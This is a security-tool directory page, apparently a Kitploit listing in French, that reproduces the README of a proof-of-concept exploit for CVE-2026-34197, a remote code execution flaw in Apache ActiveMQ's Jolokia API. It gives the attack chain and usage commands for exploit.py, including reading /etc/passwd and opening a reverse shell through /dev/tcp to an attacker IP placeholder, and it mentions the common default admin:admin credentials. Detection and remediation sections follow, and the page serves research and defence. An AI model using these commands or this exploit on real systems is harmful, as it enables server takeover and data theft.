Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-34197 — Preuve de concept d'exploitation pour CVE-2026-34197, une RCE dans Apache ActiveMQ via l'API Jolokia. Inclut un exploit Python, un modèle de payload et un laboratoire Docker pour les tests et la recherche. | Kitploit
Outils/GitHubGitHub/devsecurityspro/cve-2026-34197
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

Preuve de concept d'exploitation pour CVE-2026-34197, une RCE dans Apache ActiveMQ via l'API Jolokia. Inclut un exploit Python, un modèle de payload et un laboratoire Docker pour les tests et la recherche.

Voir le dépôt
4il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-34197 — Apache ActiveMQ RCE via API Jolokia

Description

CVE-2026-34197 est une vulnérabilité d'exécution de code à distance (RCE) dans Apache ActiveMQ Classic qui permet à un attaquant d'exécuter des commandes arbitraires sur le système d'exploitation du serveur via l'API Jolokia exposée dans la console web.

La vulnérabilité existe depuis plus de 13 ans et réside dans l'interaction entre plusieurs composants : Jolokia (pont HTTP-JMX), les MBeans d'ActiveMQ, les connecteurs réseau et le transport VM.

Informations sur la vulnérabilité

ChampDétail
CVE IDCVE-2026-34197
TypeRCE (Remote Code Execution)
CWECWE-20 (Validation d'entrée incorrecte), CWE-94 (Injection de code)
Versions affectéesActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
Versions corrigées5.19.4, 6.2.3
Authentification requiseOui (identifiants par défaut admin:admin courants)
Sans authentification sur6.0.0 — 6.1.1 (via CVE-2024-32114)
Port par défaut8161 (console web)

Mécanisme d'exploitation

La chaîne d'attaque fonctionne ainsi :

  1. L'attaquant envoie une requête POST à /api/jolokia/ en invoquant l'opération addNetworkConnector du MBean du broker.
  2. L'argument contient un URI avec le transport vm:// qui référence un broker inexistant.
  3. ActiveMQ tente de créer ce broker à la volée et accepte le paramètre brokerConfig qui pointe vers une URL distante.
  4. Le schéma xbean: indique que la ressource est un fichier de configuration Spring XML.
  5. Spring instancie tous les beans définis dans le XML, y compris un qui exécute Runtime.getRuntime().exec().
  6. La commande arbitraire est exécutée sur le serveur.
root@kitploit:~
Atacante                          ActiveMQ (víctima)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATACANTE/x.xml)  |
   |                                    |
   |                                    |-- Crea broker VM
   |                                    |-- Descarga x.xml
   |<-- GET /x.xml --------------------|
   |-- Responde con payload XML ------>|
   |                                    |-- Spring instancia beans
   |                                    |-- Runtime.exec(COMANDO)
   |                                    |

Structure du projet

root@kitploit:~
CVE-2026-34197/
├── README.md              # Este archivo
├── exploit.py             # PoC principal
├── payloads/
│   └── template.xml       # Plantilla del payload Spring XML
├── docker/
│   └── docker-compose.yml # Entorno de laboratorio vulnerable
└── LICENSE

Prérequis

  • Python 3.8+
  • Modules : requests, http.server, argparse (stdlib)
  • Accès réseau au port 8161 de la cible
  • Docker et Docker Compose (optionnel, pour le laboratoire)
root@kitploit:~
pip install requests

Utilisation

1. Lancer l'environnement vulnérable (optionnel)

root@kitploit:~
cd docker
docker-compose up -d

Cela lance un ActiveMQ Classic 5.18.6 vulnérable sur localhost:8161.

2. Exécuter l'exploit

root@kitploit:~
# Utilisation de base avec les identifiants par défaut
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id"

# Spécifier les identifiants
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "whoami" -u admin -p admin

# Spécifier le port du serveur HTTP du payload
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -lp 9999 -c "cat /etc/passwd"

# Mode sans authentification (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id" --no-auth

# Shell inversé
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "bash -i >& /dev/tcp/ATACANTE_IP/4444 0>&1"

Paramètres

ParamètreDescription
-t, --targetURL de base de la cible (ex : http://10.0.0.1:8161)
-l, --lhostIP de l'attaquant pour servir le payload XML
-lp, --lportPort du serveur HTTP local (par défaut : 8888)
-c, --commandCommande à exécuter sur la cible
-u, --userUtilisateur (par défaut : admin)
-p, --passwordMot de passe (par défaut : admin)
--no-authNe pas envoyer d'identifiants (pour les versions 6.0.0 - 6.1.1)
--broker-nameNom du broker (par défaut : localhost)

Détection

Indicateurs dans les logs du broker ActiveMQ :

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

Autres indicateurs :

  • Requêtes POST à /api/jolokia/ avec addNetworkConnector dans le corps
  • Connexions HTTP sortantes depuis le processus ActiveMQ vers des hôtes inattendus
  • Processus enfants inattendus générés par le processus Java d'ActiveMQ

Remédiation

  • Mettre à jour vers ActiveMQ Classic 5.19.4 ou 6.2.3
  • Changer les identifiants par défaut de la console web
  • Restreindre l'accès réseau au port 8161
  • Surveiller les logs du broker pour détecter les URIs vm:// avec brokerConfig=xbean:http

Références

  • NVD — CVE-2026-34197
  • Horizon3 — Analyse technique
  • Apache ActiveMQ — Avis de sécurité
  • CVE-2024-32114 — Jolokia sans authentification
  • CVE-2023-46604 — RCE OpenWire (CISA KEV)

Auteur

Créé par KONDOR DEV SECURITY

Telegram

Avis légal

Ce PoC est fourni exclusivement à des fins éducatives et de recherche en sécurité. L'utilisation de cet outil contre des systèmes sans autorisation explicite est illégale. L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil.

Licence

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

Télécharger l’outil